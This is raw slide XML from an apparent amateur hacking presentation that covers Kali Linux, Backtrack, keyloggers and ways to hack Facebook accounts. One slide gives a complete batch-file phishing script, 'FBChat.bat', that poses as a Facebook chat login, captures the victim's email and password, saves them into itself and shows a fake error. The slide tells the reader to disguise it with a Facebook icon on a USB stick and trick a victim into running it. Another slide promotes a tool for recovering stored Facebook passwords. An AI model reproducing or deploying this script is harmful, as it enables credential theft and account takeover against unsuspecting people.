                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="Description: C:\Users\kingkhan\Desktop\Keylogger-hardware-PS2-example-connect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90" y="3188694"/>
            <a:ext cx="4138611" cy="33705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Description: C:\Users\kingkhan\Desktop\free-keylogg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90" y="6927"/>
            <a:ext cx="4214810" cy="299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364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11266" name="Picture 10" descr="Description: C:\Users\kingkhan\Desktop\backtr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326" y="0"/>
            <a:ext cx="3876674" cy="3459307"/>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1" descr="Description: C:\Users\kingkhan\Desktop\kali-home-large-slide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1" y="3779095"/>
            <a:ext cx="4114800" cy="3078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457200" y="4562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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214281" y="4026456"/>
            <a:ext cx="4772891" cy="2831544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kali Linux:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="33CC33"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="22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Hacking OS based on Linux platform.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="22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Kali Linux is an open source project that is maintained and funded by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="22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Offensive Security</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="22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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="22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a provider of world-class information security training and penetration testing services.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5486400" cy="4154984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>OS for hackers:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Now-a-days hacker uses mainly two OS for hacking purpose they are:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Backtrack 5r3:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="33CC33"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Adobe Gothic Std B" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>It is intended for all audiences from the most savvy security professionals to early new comers to the information security field, it promotes a quick and easy access to find, update the largest database of security tools collection to-date. </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3256989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2289" name="Picture 12" descr="Description: C:\Users\kingkhan\Desktop\FacebookHack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000125"/>
            <a:ext cx="3368385" cy="28370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067800" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pP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Different ways to hack Facebook Account:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook Phishing with USB:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>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This is a very simple batch file to trick the victim into entering their Facebook email and password. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>T</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he information is saved into the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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batch file</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itself. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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This trick relies very much on your skills in </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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social engineering</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lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="sng" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 1:</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Paste the following code into notepad and save it as FBChat.bat .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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Do not rename it anything else or it won't work. Remember to leave a blank like after the code.</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lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2971800"/>
            <a:ext cx="3276600" cy="2999125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>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TITLE FBChat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OFF</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COLOR 03</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CLS</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LOGIN TO START CHATTING ON FACEBOOK</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Please enter your email:</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SET/P "MAIL=&gt;"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Enter the password:</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SET/P "PSWD=&gt;"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ECHO.&gt;&gt;FBChat.bat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EMAIL = %MAIL%&gt;&gt;FBChat.bat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PASSWORD = %PSWD%&gt;&gt;FBChat.bat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CLS</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indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499264" y="2667000"/>
            <a:ext cx="4038600" cy="2057400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>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TIMEOUT /T 5 &gt;NUL</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COLOR 0C</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ECHO An error occurred while connecting to the server. Try again later.</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PAUSE&gt;NUL</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EXIT</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Below this line is the collected information ----------</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="5915233"/>
            <a:ext cx="5634046" cy="677108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="33CC33"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Step 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US"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a:t>
            </a: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put this code in USB by replacing its icon with fb logo and tell him to run it in his system.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="519209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3314" name="Picture 1" descr="Description: C:\Users\kingkhan\Desktop\d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937" y="1071546"/>
            <a:ext cx="4804063" cy="2042021"/>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728" y="3219450"/>
            <a:ext cx="3427272" cy="3638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484908" y="3467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83126" y="3089298"/>
            <a:ext cx="5708074" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1638300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Facebook hacking decryptor:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1638300" algn="l"/>
              </a:tabLs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It is a free</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>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software to instantly recover stored Facebook account passwords stored by popular web </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browsers and messengers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1638300" algn="l"/>
              </a:tabLst>
            </a:pP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Often these applications use their own</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34"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Proprietary </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encryption mechanism</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to store the login passwords including</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="24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Facebook account passwords. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="1638300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="33CC33"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76198" y="0"/>
            <a:ext cx="8846127" cy="1354217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="just" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1638300" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
